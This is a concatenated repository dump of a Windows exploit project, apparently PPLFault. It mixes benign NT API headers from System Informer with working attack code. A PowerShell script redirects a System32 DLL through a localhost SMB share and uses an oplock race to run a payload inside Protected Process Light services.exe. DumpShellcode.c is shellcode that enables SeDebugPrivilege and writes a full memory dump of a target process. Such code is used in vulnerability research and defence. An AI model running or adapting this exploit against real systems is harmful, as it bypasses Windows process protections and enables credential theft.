_KCONTINUE_ARGUMENT 52 | { 53 | KCONTINUE_TYPE ContinueType; 54 | ULONG ContinueFlags; 55 | ULONGLONG Reserved[2]; 56 | } KCONTINUE_ARGUMENT, *PKCONTINUE_ARGUMENT; 57 | 58 | #define KCONTINUE_FLAG_TEST_ALERT 0x00000001 // wbenny 59 | #define KCONTINUE_FLAG_DELIVER_APC 0x00000002 // wbenny 60 | 61 | NTSYSCALLAPI 62 | NTSTATUS 63 | NTAPI 64 | NtContinueEx( 65 | _In_ PCONTEXT ContextRecord, 
66 | _In_ PVOID ContinueArgument // PKCONTINUE_ARGUMENT and BOOLEAN are valid 67 | ); 68 | 69 | //FORCEINLINE 70 | //NTSTATUS 71 | //NtContinue( 72 | // _In_ PCONTEXT ContextRecord, 73 | // _In_ BOOLEAN TestAlert 74 | // ) 75 | //{ 76 | // return NtContinueEx(ContextRecord, (PCONTINUE_ARGUMENT)TestAlert); 77 | //} 78 | #endif 79 | 80 | NTSYSCALLAPI 81 | NTSTATUS 82 | NTAPI 83 | NtRaiseException( 84 | _In_ PEXCEPTION_RECORD ExceptionRecord, 85 | _In_ PCONTEXT ContextRecord, 86 | _In_ BOOLEAN FirstChance 87 | ); 88 | 89 | __analysis_noreturn 90 | NTSYSCALLAPI 91 | VOID 92 | NTAPI 93 | RtlAssert( 94 | _In_ PVOID VoidFailedAssertion, 95 | _In_ PVOID VoidFileName, 96 | _In_ ULONG LineNumber, 97 | _In_opt_ PSTR MutableMessage 98 | ); 99 | 100 | #define RTL_ASSERT(exp) \ 101 | ((!(exp)) ? (RtlAssert((PVOID)#exp, (PVOID)__FILE__, __LINE__, NULL), FALSE) : TRUE) 102 | #define RTL_ASSERTMSG(msg, exp) \ 103 | ((!(exp)) ? (RtlAssert((PVOID)#exp, (PVOID)__FILE__, __LINE__, msg), FALSE) : TRUE) 104 | #define RTL_SOFT_ASSERT(_exp) \ 105 | ((!(_exp)) ? (DbgPrint("%s(%d): Soft assertion failed\n Expression: %s\n", __FILE__, __LINE__, #_exp), FALSE) : TRUE) 106 | #define RTL_SOFT_ASSERTMSG(_msg, _exp) \ 107 | ((!(_exp)) ? (DbgPrint("%s(%d): Soft assertion failed\n Expression: %s\n Message: %s\n", __FILE__, __LINE__, #_exp, (_msg)), FALSE) : TRUE) 108 | 109 | #endif 110 | -------------------------------------------------------------------------------- /phnt/include/phnt_windows.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Win32 definition support 3 | * 4 | * This file is part of System Informer. 5 | */ 6 | 7 | #ifndef _PHNT_WINDOWS_H 8 | #define _PHNT_WINDOWS_H 9 | 10 | // This header file provides access to Win32, plus NTSTATUS values and some access mask values. 
11 | 12 | #ifndef __cplusplus 13 | #ifndef CINTERFACE 14 | #define CINTERFACE 15 | #endif 16 | 17 | #ifndef COBJMACROS 18 | #define COBJMACROS 19 | #endif 20 | #endif 21 | 22 | #ifndef INITGUID 23 | #define INITGUID 24 | #endif 25 | 26 | #ifndef WIN32_LEAN_AND_MEAN 27 | #define WIN32_LEAN_AND_MEAN 28 | #endif 29 | 30 | #ifndef WIN32_NO_STATUS 31 | #define WIN32_NO_STATUS 32 | #endif 33 | 34 | #ifndef __cplusplus 35 | // This is needed to workaround C17 preprocessor errors when using legacy versions of the Windows SDK. (dmex) 36 | #ifndef MICROSOFT_WINDOWS_WINBASE_H_DEFINE_INTERLOCKED_CPLUSPLUS_OVERLOADS 37 | #define MICROSOFT_WINDOWS_WINBASE_H_DEFINE_INTERLOCKED_CPLUSPLUS_OVERLOADS 0 38 | #endif 39 | #endif 40 | 41 | #include 42 | #include 43 | #undef WIN32_NO_STATUS 44 | #include 45 | #include 46 | 47 | typedef double DOUBLE; 48 | typedef GUID *PGUID; 49 | 50 | // Desktop access rights 51 | #define DESKTOP_ALL_ACCESS \ 52 | (DESKTOP_CREATEMENU | DESKTOP_CREATEWINDOW | DESKTOP_ENUMERATE | \ 53 | DESKTOP_HOOKCONTROL | DESKTOP_JOURNALPLAYBACK | DESKTOP_JOURNALRECORD | \ 54 | DESKTOP_READOBJECTS | DESKTOP_SWITCHDESKTOP | DESKTOP_WRITEOBJECTS | \ 55 | STANDARD_RIGHTS_REQUIRED) 56 | #define DESKTOP_GENERIC_READ \ 57 | (DESKTOP_ENUMERATE | DESKTOP_READOBJECTS | STANDARD_RIGHTS_READ) 58 | #define DESKTOP_GENERIC_WRITE \ 59 | (DESKTOP_CREATEMENU | DESKTOP_CREATEWINDOW | DESKTOP_HOOKCONTROL | \ 60 | DESKTOP_JOURNALPLAYBACK | DESKTOP_JOURNALRECORD | DESKTOP_WRITEOBJECTS | \ 61 | STANDARD_RIGHTS_WRITE) 62 | #define DESKTOP_GENERIC_EXECUTE \ 63 | (DESKTOP_SWITCHDESKTOP | STANDARD_RIGHTS_EXECUTE) 64 | 65 | // Window station access rights 66 | #define WINSTA_GENERIC_READ \ 67 | (WINSTA_ENUMDESKTOPS | WINSTA_ENUMERATE | WINSTA_READATTRIBUTES | \ 68 | WINSTA_READSCREEN | STANDARD_RIGHTS_READ) 69 | #define WINSTA_GENERIC_WRITE \ 70 | (WINSTA_ACCESSCLIPBOARD | WINSTA_CREATEDESKTOP | WINSTA_WRITEATTRIBUTES | \ 71 | STANDARD_RIGHTS_WRITE) 72 | #define WINSTA_GENERIC_EXECUTE \ 73 | 
(WINSTA_ACCESSGLOBALATOMS | WINSTA_EXITWINDOWS | STANDARD_RIGHTS_EXECUTE) 74 | 75 | // WMI access rights 76 | #define WMIGUID_GENERIC_READ \ 77 | (WMIGUID_QUERY | WMIGUID_NOTIFICATION | WMIGUID_READ_DESCRIPTION | \ 78 | STANDARD_RIGHTS_READ) 79 | #define WMIGUID_GENERIC_WRITE \ 80 | (WMIGUID_SET | TRACELOG_CREATE_REALTIME | TRACELOG_CREATE_ONDISK | \ 81 | STANDARD_RIGHTS_WRITE) 82 | #define WMIGUID_GENERIC_EXECUTE \ 83 | (WMIGUID_EXECUTE | TRACELOG_GUID_ENABLE | TRACELOG_LOG_EVENT | \ 84 | TRACELOG_ACCESS_REALTIME | TRACELOG_REGISTER_GUIDS | \ 85 | STANDARD_RIGHTS_EXECUTE) 86 | 87 | #endif 88 | -------------------------------------------------------------------------------- /phnt/include/phnt.h: -------------------------------------------------------------------------------- 1 | /* 2 | * NT Header annotations 3 | * 4 | * This file is part of System Informer. 5 | */ 6 | 7 | #ifndef _PHNT_H 8 | #define _PHNT_H 9 | 10 | // This header file provides access to NT APIs. 11 | 12 | // Definitions are annotated to indicate their source. If a definition is not annotated, it has been 13 | // retrieved from an official Microsoft source (NT headers, DDK headers, winnt.h). 14 | 15 | // * "winbase" indicates that a definition has been reconstructed from a Win32-ized NT definition in 16 | // winbase.h. 17 | // * "rev" indicates that a definition has been reverse-engineered. 18 | // * "dbg" indicates that a definition has been obtained from a debug message or assertion in a 19 | // checked build of the kernel or file. 20 | 21 | // Reliability: 22 | // 1. No annotation. 23 | // 2. dbg. 24 | // 3. symbols, private. Types may be incorrect. 25 | // 4. winbase. Names and types may be incorrect. 26 | // 5. rev. 
27 | 28 | // Mode 29 | #define PHNT_MODE_KERNEL 0 30 | #define PHNT_MODE_USER 1 31 | 32 | // Version 33 | #define PHNT_WIN2K 50 34 | #define PHNT_WINXP 51 35 | #define PHNT_WS03 52 36 | #define PHNT_VISTA 60 37 | #define PHNT_WIN7 61 38 | #define PHNT_WIN8 62 39 | #define PHNT_WINBLUE 63 40 | #define PHNT_THRESHOLD 100 41 | #define PHNT_THRESHOLD2 101 42 | #define PHNT_REDSTONE 102 43 | #define PHNT_REDSTONE2 103 44 | #define PHNT_REDSTONE3 104 45 | #define PHNT_REDSTONE4 105 46 | #define PHNT_REDSTONE5 106 47 | #define PHNT_19H1 107 48 | #define PHNT_19H2 108 49 | #define PHNT_20H1 109 50 | #define PHNT_20H2 110 51 | #define PHNT_21H1 111 52 | #define PHNT_21H2 112 53 | #define PHNT_WIN11 113 54 | 55 | #ifndef PHNT_MODE 56 | #define PHNT_MODE PHNT_MODE_USER 57 | #endif 58 | 59 | #ifndef PHNT_VERSION 60 | #define PHNT_VERSION PHNT_WIN7 61 | #endif 62 | 63 | // Options 64 | 65 | //#define PHNT_NO_INLINE_INIT_STRING 66 | 67 | #ifdef __cplusplus 68 | extern "C" { 69 | #endif 70 | 71 | #if (PHNT_MODE != PHNT_MODE_KERNEL) 72 | #include 73 | #include 74 | #include 75 | #endif 76 | 77 | #include 78 | #include 79 | 80 | #include 81 | #include 82 | #include 83 | #include 84 | 85 | #if (PHNT_MODE != PHNT_MODE_KERNEL) 86 | #include 87 | #include 88 | #include 89 | #include 90 | #include 91 | #include 92 | #include 93 | #include 94 | #include 95 | #endif 96 | 97 | #if (PHNT_MODE != PHNT_MODE_KERNEL) 98 | 99 | #include 100 | #include 101 | #include 102 | #include 103 | 104 | #include 105 | 106 | #include 107 | #include 108 | 109 | #include 110 | 111 | #include 112 | 113 | #endif 114 | 115 | #ifdef __cplusplus 116 | } 117 | #endif 118 | 119 | #endif 120 | -------------------------------------------------------------------------------- /phnt/include/subprocesstag.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Subprocess tag information 3 | * 4 | * This file is part of System Informer. 
5 | */ 6 | 7 | #ifndef _SUBPROCESSTAG_H 8 | #define _SUBPROCESSTAG_H 9 | 10 | typedef enum _TAG_INFO_LEVEL 11 | { 12 | eTagInfoLevelNameFromTag = 1, // TAG_INFO_NAME_FROM_TAG 13 | eTagInfoLevelNamesReferencingModule, // TAG_INFO_NAMES_REFERENCING_MODULE 14 | eTagInfoLevelNameTagMapping, // TAG_INFO_NAME_TAG_MAPPING 15 | eTagInfoLevelMax 16 | } TAG_INFO_LEVEL; 17 | 18 | typedef enum _TAG_TYPE 19 | { 20 | eTagTypeService = 1, 21 | eTagTypeMax 22 | } TAG_TYPE; 23 | 24 | typedef struct _TAG_INFO_NAME_FROM_TAG_IN_PARAMS 25 | { 26 | ULONG dwPid; 27 | ULONG dwTag; 28 | } TAG_INFO_NAME_FROM_TAG_IN_PARAMS, *PTAG_INFO_NAME_FROM_TAG_IN_PARAMS; 29 | 30 | typedef struct _TAG_INFO_NAME_FROM_TAG_OUT_PARAMS 31 | { 32 | ULONG eTagType; 33 | PWSTR pszName; 34 | } TAG_INFO_NAME_FROM_TAG_OUT_PARAMS, *PTAG_INFO_NAME_FROM_TAG_OUT_PARAMS; 35 | 36 | typedef struct _TAG_INFO_NAME_FROM_TAG 37 | { 38 | TAG_INFO_NAME_FROM_TAG_IN_PARAMS InParams; 39 | TAG_INFO_NAME_FROM_TAG_OUT_PARAMS OutParams; 40 | } TAG_INFO_NAME_FROM_TAG, *PTAG_INFO_NAME_FROM_TAG; 41 | 42 | typedef struct _TAG_INFO_NAMES_REFERENCING_MODULE_IN_PARAMS 43 | { 44 | ULONG dwPid; 45 | PWSTR pszModule; 46 | } TAG_INFO_NAMES_REFERENCING_MODULE_IN_PARAMS, *PTAG_INFO_NAMES_REFERENCING_MODULE_IN_PARAMS; 47 | 48 | typedef struct _TAG_INFO_NAMES_REFERENCING_MODULE_OUT_PARAMS 49 | { 50 | ULONG eTagType; 51 | PWSTR pmszNames; 52 | } TAG_INFO_NAMES_REFERENCING_MODULE_OUT_PARAMS, *PTAG_INFO_NAMES_REFERENCING_MODULE_OUT_PARAMS; 53 | 54 | typedef struct _TAG_INFO_NAMES_REFERENCING_MODULE 55 | { 56 | TAG_INFO_NAMES_REFERENCING_MODULE_IN_PARAMS InParams; 57 | TAG_INFO_NAMES_REFERENCING_MODULE_OUT_PARAMS OutParams; 58 | } TAG_INFO_NAMES_REFERENCING_MODULE, *PTAG_INFO_NAMES_REFERENCING_MODULE; 59 | 60 | typedef struct _TAG_INFO_NAME_TAG_MAPPING_IN_PARAMS 61 | { 62 | ULONG dwPid; 63 | } TAG_INFO_NAME_TAG_MAPPING_IN_PARAMS, *PTAG_INFO_NAME_TAG_MAPPING_IN_PARAMS; 64 | 65 | typedef struct _TAG_INFO_NAME_TAG_MAPPING_ELEMENT 66 | { 67 | ULONG 
eTagType; 68 | ULONG dwTag; 69 | PWSTR pszName; 70 | PWSTR pszGroupName; 71 | } TAG_INFO_NAME_TAG_MAPPING_ELEMENT, *PTAG_INFO_NAME_TAG_MAPPING_ELEMENT; 72 | 73 | typedef struct _TAG_INFO_NAME_TAG_MAPPING_OUT_PARAMS 74 | { 75 | ULONG cElements; 76 | PTAG_INFO_NAME_TAG_MAPPING_ELEMENT pNameTagMappingElements; 77 | } TAG_INFO_NAME_TAG_MAPPING_OUT_PARAMS, *PTAG_INFO_NAME_TAG_MAPPING_OUT_PARAMS; 78 | 79 | typedef struct _TAG_INFO_NAME_TAG_MAPPING 80 | { 81 | TAG_INFO_NAME_TAG_MAPPING_IN_PARAMS InParams; 82 | PTAG_INFO_NAME_TAG_MAPPING_OUT_PARAMS pOutParams; 83 | } TAG_INFO_NAME_TAG_MAPPING, *PTAG_INFO_NAME_TAG_MAPPING; 84 | 85 | _Must_inspect_result_ 86 | ULONG 87 | WINAPI 88 | I_QueryTagInformation( 89 | _In_opt_ PCWSTR MachineName, 90 | _In_ TAG_INFO_LEVEL InfoLevel, 91 | _Inout_ PVOID TagInfo 92 | ); 93 | 94 | typedef ULONG (WINAPI *PQUERY_TAG_INFORMATION)( 95 | _In_opt_ PCWSTR MachineName, 96 | _In_ TAG_INFO_LEVEL InfoLevel, 97 | _Inout_ PVOID TagInfo 98 | ); 99 | 100 | #endif 101 | -------------------------------------------------------------------------------- /NoFault/NoFault.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | #define PHNT_MODE 0 6 | #pragma warning(push) 7 | #pragma warning(disable: 4201) // nonstandard extension used: nameless struct/union 8 | #include 9 | //#include 10 | #pragma warning(pop) 11 | 12 | extern "C" { 13 | 14 | NTSYSAPI 15 | NTSTATUS 16 | NTAPI 17 | ZwSetInformationProcess( 18 | IN HANDLE ProcessHandle, 19 | IN PROCESSINFOCLASS ProcessInformationClass, 20 | IN PVOID ProcessInformation, 21 | IN ULONG ProcessInformationLength); 22 | 23 | NTSTATUS NTAPI ZwQueryInformationProcess( 24 | _In_ HANDLE ProcessHandle, 25 | _In_ PROCESSINFOCLASS ProcessInformationClass, 26 | _Out_ PVOID ProcessInformation, 27 | _In_ ULONG ProcessInformationLength, 28 | _Out_opt_ PULONG ReturnLength 29 | ); 30 | 31 | #pragma warning(push) 32 | #pragma warning(disable: 4201) // warning 
C4201: nonstandard extension used: nameless struct/union 33 | #pragma warning(disable: 4214) // warning C4214: nonstandard extension used: bit field types other than int 34 | 35 | // From https://docs.microsoft.com/en-us/windows/win32/procthread/zwqueryinformationprocess 36 | typedef enum _PS_PROTECTED_TYPE { 37 | PsProtectedTypeNone = 0, 38 | PsProtectedTypeProtectedLight = 1, 39 | PsProtectedTypeProtected = 2 40 | } PS_PROTECTED_TYPE, * PPS_PROTECTED_TYPE; 41 | 42 | typedef enum _PS_PROTECTED_SIGNER { 43 | PsProtectedSignerNone = 0, 44 | PsProtectedSignerAuthenticode, 45 | PsProtectedSignerCodeGen, 46 | PsProtectedSignerAntimalware, 47 | PsProtectedSignerLsa, 48 | PsProtectedSignerWindows, 49 | PsProtectedSignerWinTcb, 50 | PsProtectedSignerWinSystem, 51 | PsProtectedSignerApp, 52 | PsProtectedSignerMax 53 | } PS_PROTECTED_SIGNER, * PPS_PROTECTED_SIGNER; 54 | 55 | typedef struct _PS_PROTECTION { 56 | union { 57 | UCHAR Level; 58 | struct { 59 | UCHAR Type : 3; 60 | UCHAR Audit : 1; // Reserved 61 | UCHAR Signer : 4; 62 | }; 63 | }; 64 | } PS_PROTECTION, * PPS_PROTECTION; 65 | 66 | // private 67 | typedef struct _PROCESS_MITIGATION_POLICY_INFORMATION 68 | { 69 | PROCESS_MITIGATION_POLICY Policy; 70 | union 71 | { 72 | PROCESS_MITIGATION_ASLR_POLICY ASLRPolicy; 73 | PROCESS_MITIGATION_STRICT_HANDLE_CHECK_POLICY StrictHandleCheckPolicy; 74 | PROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY SystemCallDisablePolicy; 75 | PROCESS_MITIGATION_EXTENSION_POINT_DISABLE_POLICY ExtensionPointDisablePolicy; 76 | PROCESS_MITIGATION_DYNAMIC_CODE_POLICY DynamicCodePolicy; 77 | PROCESS_MITIGATION_CONTROL_FLOW_GUARD_POLICY ControlFlowGuardPolicy; 78 | PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY SignaturePolicy; 79 | PROCESS_MITIGATION_FONT_DISABLE_POLICY FontDisablePolicy; 80 | PROCESS_MITIGATION_IMAGE_LOAD_POLICY ImageLoadPolicy; 81 | PROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY SystemCallFilterPolicy; 82 | PROCESS_MITIGATION_PAYLOAD_RESTRICTION_POLICY PayloadRestrictionPolicy; 83 | 
PROCESS_MITIGATION_CHILD_PROCESS_POLICY ChildProcessPolicy; 84 | PROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY SideChannelIsolationPolicy; 85 | PROCESS_MITIGATION_USER_SHADOW_STACK_POLICY UserShadowStackPolicy; 86 | PROCESS_MITIGATION_REDIRECTION_TRUST_POLICY RedirectionTrustPolicy; 87 | }; 88 | } PROCESS_MITIGATION_POLICY_INFORMATION, * PPROCESS_MITIGATION_POLICY_INFORMATION; 89 | 90 | #pragma warning(pop) 91 | 92 | } -------------------------------------------------------------------------------- /python/PPLFault-Localhost-SMB.ps1: -------------------------------------------------------------------------------- 1 | 2 | $SMBListeners = Get-NetTcpConnection | Where LocalPort -eq 445 | Where State -eq Listen 3 | if ($SMBListeners -and ($SMBListeners).OwningProcess -eq 4) 4 | { 5 | Write-Output "Performing setup." 6 | Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force 7 | Install-Module NtObjectManager -Force 8 | Set-Service -Name LanManServer -StartupType Disabled 9 | winget install Python.Python.3.8 --accept-source-agreements --accept-package-agreements 10 | py -m pip install wheel 11 | py -m pip install pywin32 impacket pefile 12 | 13 | Write-Output "" 14 | Write-Output "Setup complete. Please any key to reboot the machine." 
15 | Write-Output "After reboot, re-run this script to perform the exploit" 16 | pause 17 | shutdown /r /t 0 18 | } 19 | 20 | # Setup - redirect a DLL over localhost SMB 21 | (Get-NtToken).SetPrivilege("SeBackupPrivilege", $true) 22 | (Get-NtToken).SetPrivilege("SeRestorePrivilege", $true) 23 | Rename-NtFile '\??\C:\Windows\System32\EventAggregation.dll' -NewName '\??\C:\Windows\System32\EventAggregation.dll.bak' -Options OpenForBackupIntent -ShareMode Read,Write,Delete -Access Delete 24 | cmd /c mklink C:\Windows\System32\EventAggregation.dll \\127.0.0.1\C$\Windows\System32\EventAggregation.dll.bak 25 | 26 | # Set an oplock that will let us force a race condition in service.exe's initialization 27 | $OplockPath = "\??\C:\Windows\System32\devobj.dll" 28 | $OplockFile = Get-NtFile -Path $OplockPath -Access ReadAttributes 29 | $Oplock = Start-NtFileOplock $OplockFile -Async -Exclusive 30 | 31 | # Payload to run as PPL 32 | 33 | # This payload requires a kernel debugger to view 34 | # If you use this payload, type this in WinDbg afterwards: db @rip; dx @$curprocess->Name; dx @$curprocess->KernelObject->Protection 35 | # $Payload = "CC" + ("90" * 16) + ("CAFEC0DE" * 64) 36 | 37 | # Simple "infinite loop" payload 38 | $Payload = "EBFE" 39 | 40 | # Restart local SMB server 41 | taskkill /f /im python.exe 42 | cmd /c start py smbserver.py -payload $Payload 43 | start-sleep 1 44 | 45 | # Start services.exe and wait for it to initiate an oplock break 46 | $BeforeProcs = Get-Process -Name services 47 | py -c "import win32process; si = win32process.STARTUPINFO(); win32process.CreateProcess(r'C:\Windows\System32\services.exe',None,None,None,False,0x40000,None,None,si)" 48 | Wait-AsyncTaskResult $Oplock 49 | 50 | # Empty working sets 51 | py -c "import ctypes; cmd=ctypes.c_ulong(2); ctypes.windll.ntdll.RtlAdjustPrivilege(13,True,False,ctypes.byref(ctypes.c_ulong())); print(ctypes.windll.ntdll.NtSetSystemInformation(80, ctypes.byref(cmd), ctypes.sizeof(cmd)))" 52 | # Empty 
standby list 53 | py -c "import ctypes; cmd=ctypes.c_ulong(4); ctypes.windll.ntdll.RtlAdjustPrivilege(13,True,False,ctypes.byref(ctypes.c_ulong())); print(ctypes.windll.ntdll.NtSetSystemInformation(80, ctypes.byref(cmd), ctypes.sizeof(cmd)))" 54 | 55 | start-sleep 1 56 | 57 | # Release PPL services.exe 58 | Confirm-NtFileOplock $OplockFile -Level Acknowledge 59 | 60 | start-sleep 2 61 | taskkill /f /im python.exe 62 | 63 | # Cleanup 64 | Remove-Item 'C:\Windows\System32\EventAggregation.dll' 65 | Rename-NtFile '\??\C:\Windows\System32\EventAggregation.dll.bak' -NewName '\??\C:\Windows\System32\EventAggregation.dll' -Options OpenForBackupIntent -ShareMode Read,Write,Delete -Access Delete 66 | 67 | $AfterProcs = Get-Process -Name services | Where-Object {$_.Id -NotIn $BeforeProcs.Id} 68 | 69 | $NewPid = $AfterProcs[0].Id 70 | $Protection = (Get-NtProcess $NewPid -Access QueryLimitedInformation).Protection 71 | $ProtectionType = $Protection.Type 72 | $ProtectionSigner = $Protection.Signer 73 | 74 | Write-Output "" 75 | Write-Output "services.exe (PID $NewPid) is running as $ProtectionSigner-$ProtectionType" 76 | Write-Output "Check it out in Task Manager - it should be spinning a CPU core" 77 | taskmgr.exe 78 | -------------------------------------------------------------------------------- /DumpShellcode/DumpShellcode.c: -------------------------------------------------------------------------------- 1 | #define _CRT_SECURE_NO_WARNINGS 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #include "DumpShellcode.h" 10 | 11 | #pragma optimize("", off) 12 | 13 | PSHELLCODE_PARAMS GetParams(); 14 | 15 | // Overwrites DllMain (technically CRT DllMain) 16 | BOOL APIENTRY Shellcode( 17 | HMODULE hModule, 18 | DWORD ul_reason_for_call, 19 | LPVOID lpReserved 20 | ) 21 | { 22 | PSHELLCODE_PARAMS pParams = NULL; 23 | MiniDumpWriteDump_t pMiniDumpWriteDump = NULL; 24 | HANDLE hProcess = NULL; 25 | HANDLE hFile = NULL; 26 | HMODULE hDbgHelp = NULL; 27 | 
DWORD ignored = 0; 28 | 29 | pParams = GetParams(); 30 | 31 | // Resolve remaining import 32 | hDbgHelp = pParams->pLoadLibraryW(pParams->szDbgHelpDll); 33 | if (NULL == hDbgHelp) 34 | { 35 | __debugbreak(); 36 | } 37 | 38 | pMiniDumpWriteDump = (MiniDumpWriteDump_t)pParams->pGetProcAddress(hDbgHelp, pParams->szMiniDumpWriteDump); 39 | if (NULL == pMiniDumpWriteDump) 40 | { 41 | __debugbreak(); 42 | } 43 | 44 | // Enable SeDebugPrivilege 45 | if (0 != pParams->pRtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, &ignored)) 46 | { 47 | __debugbreak(); 48 | } 49 | 50 | // Acquire handle to target 51 | hProcess = pParams->pOpenProcess(MAXIMUM_ALLOWED, FALSE, pParams->dwTargetProcessId); 52 | if (NULL == hProcess) 53 | { 54 | __debugbreak(); 55 | } 56 | 57 | // Create output file 58 | hFile = pParams->pCreateFileW(pParams->dumpPath, FILE_ALL_ACCESS, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); 59 | if (INVALID_HANDLE_VALUE == hFile) 60 | { 61 | __debugbreak(); 62 | } 63 | 64 | // Capture dump 65 | if (!pMiniDumpWriteDump(hProcess, pParams->dwTargetProcessId, hFile, MiniDumpWithFullMemory, NULL, NULL, NULL)) 66 | { 67 | __debugbreak(); 68 | } 69 | 70 | // Don't trigger WER 71 | (void)pParams->pTerminateProcess((HANDLE)-1, 0); 72 | 73 | return TRUE; 74 | } 75 | 76 | PVOID WhereAmI() 77 | { 78 | return _ReturnAddress(); 79 | } 80 | 81 | PSHELLCODE_PARAMS GetParams() 82 | { 83 | PUCHAR pSearch = (PUCHAR)WhereAmI(); 84 | 85 | for (;;pSearch++) 86 | { 87 | PSHELLCODE_PARAMS pCandidate = (PSHELLCODE_PARAMS)pSearch; 88 | 89 | if ((MAGIC1 == pCandidate->magic1) && (MAGIC2 == pCandidate->magic2)) 90 | { 91 | return pCandidate; 92 | } 93 | } 94 | 95 | return NULL; 96 | } 97 | 98 | BOOL EndShellcode() 99 | { 100 | return TRUE; 101 | } 102 | 103 | #include 104 | 105 | int main() 106 | { 107 | WCHAR myPath[MAX_PATH] = { 0, }; 108 | HMODULE hMe = GetModuleHandle(NULL); 109 | PUCHAR shellcodeStart = (PUCHAR)GetProcAddress(hMe, "Shellcode"); 110 | PUCHAR shellcodeEnd = 
(PUCHAR)GetProcAddress(hMe, "EndShellcode"); 111 | const SIZE_T shellcodeLength = (DWORD)(ULONG_PTR)(shellcodeEnd - shellcodeStart); 112 | HMODULE hFile = NULL; 113 | DWORD bytesWritten = 0; 114 | 115 | GetModuleFileNameW(NULL, myPath, ARRAYSIZE(myPath)); 116 | wcsncat(myPath, L".shellcode", ARRAYSIZE(myPath) - wcslen(myPath)); 117 | 118 | hFile = CreateFileW(myPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); 119 | if (INVALID_HANDLE_VALUE == hFile) 120 | { 121 | printf(" [!] Failed to open output file: %ws\n", myPath); 122 | return 1; 123 | } 124 | if (!WriteFile(hFile, shellcodeStart, (DWORD)shellcodeLength, &bytesWritten, NULL) || 125 | (bytesWritten != shellcodeLength)) 126 | { 127 | printf(" [!] Failed to write shellcode with GLE %u\n", GetLastError()); 128 | return 1; 129 | } 130 | 131 | printf(" [+] Shellcode written to output file: %ws\n", myPath); 132 | 133 | return 0; 134 | } 135 | -------------------------------------------------------------------------------- /phnt/include/ntmisc.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Trace Control support functions 3 | * 4 | * This file is part of System Informer. 
5 | */ 6 | 7 | #ifndef _NTMISC_H 8 | #define _NTMISC_H 9 | 10 | // Filter manager 11 | 12 | #define FLT_PORT_CONNECT 0x0001 13 | #define FLT_PORT_ALL_ACCESS (FLT_PORT_CONNECT | STANDARD_RIGHTS_ALL) 14 | 15 | // VDM 16 | 17 | typedef enum _VDMSERVICECLASS 18 | { 19 | VdmStartExecution, 20 | VdmQueueInterrupt, 21 | VdmDelayInterrupt, 22 | VdmInitialize, 23 | VdmFeatures, 24 | VdmSetInt21Handler, 25 | VdmQueryDir, 26 | VdmPrinterDirectIoOpen, 27 | VdmPrinterDirectIoClose, 28 | VdmPrinterInitialize, 29 | VdmSetLdtEntries, 30 | VdmSetProcessLdtInfo, 31 | VdmAdlibEmulation, 32 | VdmPMCliControl, 33 | VdmQueryVdmProcess, 34 | VdmPreInitialize 35 | } VDMSERVICECLASS, *PVDMSERVICECLASS; 36 | 37 | NTSYSCALLAPI 38 | NTSTATUS 39 | NTAPI 40 | NtVdmControl( 41 | _In_ VDMSERVICECLASS Service, 42 | _Inout_ PVOID ServiceData 43 | ); 44 | 45 | // WMI/ETW 46 | 47 | NTSYSCALLAPI 48 | NTSTATUS 49 | NTAPI 50 | NtTraceEvent( 51 | _In_ HANDLE TraceHandle, 52 | _In_ ULONG Flags, 53 | _In_ ULONG FieldSize, 54 | _In_ PVOID Fields 55 | ); 56 | 57 | typedef enum _TRACE_CONTROL_INFORMATION_CLASS 58 | { 59 | TraceControlStartLogger = 1, // inout WMI_LOGGER_INFORMATION 60 | TraceControlStopLogger = 2, // inout WMI_LOGGER_INFORMATION 61 | TraceControlQueryLogger = 3, // inout WMI_LOGGER_INFORMATION 62 | TraceControlUpdateLogger = 4, // inout WMI_LOGGER_INFORMATION 63 | TraceControlFlushLogger = 5, // inout WMI_LOGGER_INFORMATION 64 | TraceControlIncrementLoggerFile = 6, // inout WMI_LOGGER_INFORMATION 65 | TraceControlUnknown = 7, 66 | // unused 67 | TraceControlRealtimeConnect = 11, 68 | TraceControlActivityIdCreate = 12, 69 | TraceControlWdiDispatchControl = 13, 70 | TraceControlRealtimeDisconnectConsumerByHandle = 14, // in HANDLE 71 | TraceControlRegisterGuidsCode = 15, 72 | TraceControlReceiveNotification = 16, 73 | TraceControlSendDataBlock = 17, // ETW_ENABLE_NOTIFICATION_PACKET 74 | TraceControlSendReplyDataBlock = 18, 75 | TraceControlReceiveReplyDataBlock = 19, 76 | 
TraceControlWdiUpdateSem = 20, 77 | TraceControlEnumTraceGuidList = 21, // out GUID[] 78 | TraceControlGetTraceGuidInfo = 22, // in GUID, out TRACE_GUID_INFO 79 | TraceControlEnumerateTraceGuids = 23, 80 | TraceControlRegisterSecurityProv = 24, 81 | TraceControlQueryReferenceTime = 25, 82 | TraceControlTrackProviderBinary = 26, // in HANDLE 83 | TraceControlAddNotificationEvent = 27, 84 | TraceControlUpdateDisallowList = 28, 85 | TraceControlSetEnableAllKeywordsCode = 29, 86 | TraceControlSetProviderTraitsCode = 30, 87 | TraceControlUseDescriptorTypeCode = 31, 88 | TraceControlEnumTraceGroupList = 32, 89 | TraceControlGetTraceGroupInfo = 33, 90 | TraceControlTraceSetDisallowList = 34, 91 | TraceControlSetCompressionSettings = 35, 92 | TraceControlGetCompressionSettings = 36, 93 | TraceControlUpdatePeriodicCaptureState = 37, 94 | TraceControlGetPrivateSessionTraceHandle = 38, 95 | TraceControlRegisterPrivateSession = 39, 96 | TraceControlQuerySessionDemuxObject = 40, 97 | TraceControlSetProviderBinaryTracking = 41, 98 | TraceControlMaxLoggers = 42, // out ULONG 99 | TraceControlMaxPmcCounter = 43, // out ULONG 100 | TraceControlQueryUsedProcessorCount = 44, // ULONG // since WIN11 101 | TraceControlGetPmcOwnership = 45, 102 | } 